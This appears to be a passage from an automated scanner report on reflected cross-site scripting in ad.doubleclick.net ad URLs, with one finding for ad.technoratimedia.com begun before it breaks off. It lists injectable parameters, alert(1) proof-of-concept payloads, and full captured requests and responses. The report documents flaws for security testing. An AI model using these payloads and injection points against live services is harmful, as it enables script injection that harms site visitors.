GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=406a9'-alert(1)-'46cf963601 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6072 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:18:25 GMT Expires: Sun, 20 Mar 2011 17:18:25 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ad0/7/7d/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=406a9'-alert(1)-'46cf963601https://chrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc?utm_source=en-oa-na-us-N5295.150800.VALUECLICK&utm_medium=oa&utm_campaign=en\"> ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89a5d"-alert(1)-"fcb19aa1da5 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=89a5d"-alert(1)-"fcb19aa1da5 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6076 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:18:21 GMT Expires: Sun, 20 Mar 2011 17:18:21 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ad0/7/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=89a5d"-alert(1)-"fcb19aa1da5https://chrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc?utm_source=en-oa-na-us-N5295.150800.VALUECLICK&utm_medium=oa&utm_campaign=en"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9246"-alert(1)-"5a9c202837b was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3f9246"-alert(1)-"5a9c202837b&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:15:29 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:15:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3f9246"-alert(1)-"5a9c202837b&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3De ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90ca9'-alert(1)-'3b957cae5d0 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=390ca9'-alert(1)-'3b957cae5d0&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:15:33 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:15:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=390ca9'-alert(1)-'3b957cae5d0&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3De ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d97'-alert(1)-'85cdf973d14 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=53925114d97'-alert(1)-'85cdf973d14&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:14:50 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:50 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... //ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=53925114d97'-alert(1)-'85cdf973d14&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83c6"-alert(1)-"cb65c717218 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251f83c6"-alert(1)-"cb65c717218&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:14:46 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... //ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251f83c6"-alert(1)-"cb65c717218&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec0e7'-alert(1)-'221eec829b was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857ec0e7'-alert(1)-'221eec829b&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:16:16 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:16:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6126
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ck.net/click%3Bh%3Dv8/3ad0/f/7d/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857ec0e7'-alert(1)-'221eec829b&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28d80"-alert(1)-"d667948a37d was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=4785728d80"-alert(1)-"d667948a37d&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:16:12 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:16:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ck.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=4785728d80"-alert(1)-"d667948a37d&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den"); var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff1ca"-alert(1)-"487523993d2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503ff1ca"-alert(1)-"487523993d2&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:14:16 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503ff1ca"-alert(1)-"487523993d2&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26u ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27e79'-alert(1)-'ef9404d6e79 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=28850327e79'-alert(1)-'ef9404d6e79&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:14:20 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=28850327e79'-alert(1)-'ef9404d6e79&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26u ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60aad'-alert(1)-'e72e3365ae1 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=760aad'-alert(1)-'e72e3365ae1&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:17:42 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:17:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=760aad'-alert(1)-'e72e3365ae1&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dd35"-alert(1)-"77d42671dca was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=72dd35"-alert(1)-"77d42671dca&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:17:38 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:17:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=72dd35"-alert(1)-"77d42671dca&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den"); var fscUrl = ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52806'-alert(1)-'1950dbb4dde was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5554.acerno.com/B5224009.7;click=52806'-alert(1)-'1950dbb4dde HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?UbwUAGFwDADJKoIAAAAAAHC4EQAAAAAAAgAEAAYAAAAAAP8AAAABDTF.GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACqsvTHEBzPCVCAR.nLIFOdMgiZVYfnKjX27zwEAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3Fsize%3D728x90%26m%3D3%26l%3D1177298%26c%3D150,Z%3D728x90%26s%3D815201%26_salt%3D3980777459%26B%3D10%26r%3D0,79331f34-5316-11e0-a8b1-001b24784a22 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 257 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:26:31 GMT Expires: Sun, 20 Mar 2011 17:26:31 GMT
4.43. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.technoratimedia.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b37d"-alert(1)-"45e6ab6a264 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
